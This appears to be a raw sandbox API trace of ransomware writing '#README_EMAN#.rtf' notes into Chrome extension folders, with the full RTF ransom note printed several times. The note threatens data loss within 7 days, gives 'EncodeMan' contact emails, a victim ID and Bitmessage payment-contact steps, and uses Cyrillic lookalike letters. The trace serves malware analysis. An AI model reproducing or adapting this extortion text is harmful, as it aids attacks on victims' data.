tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.167] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.167] CloseHandle (hObject=0x2ec) returned 1 [0291.167] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#readme_eman#.rtf")) returned 0x20 [0291.168] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0291.168] GetLastError () returned 0x2 [0291.168] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 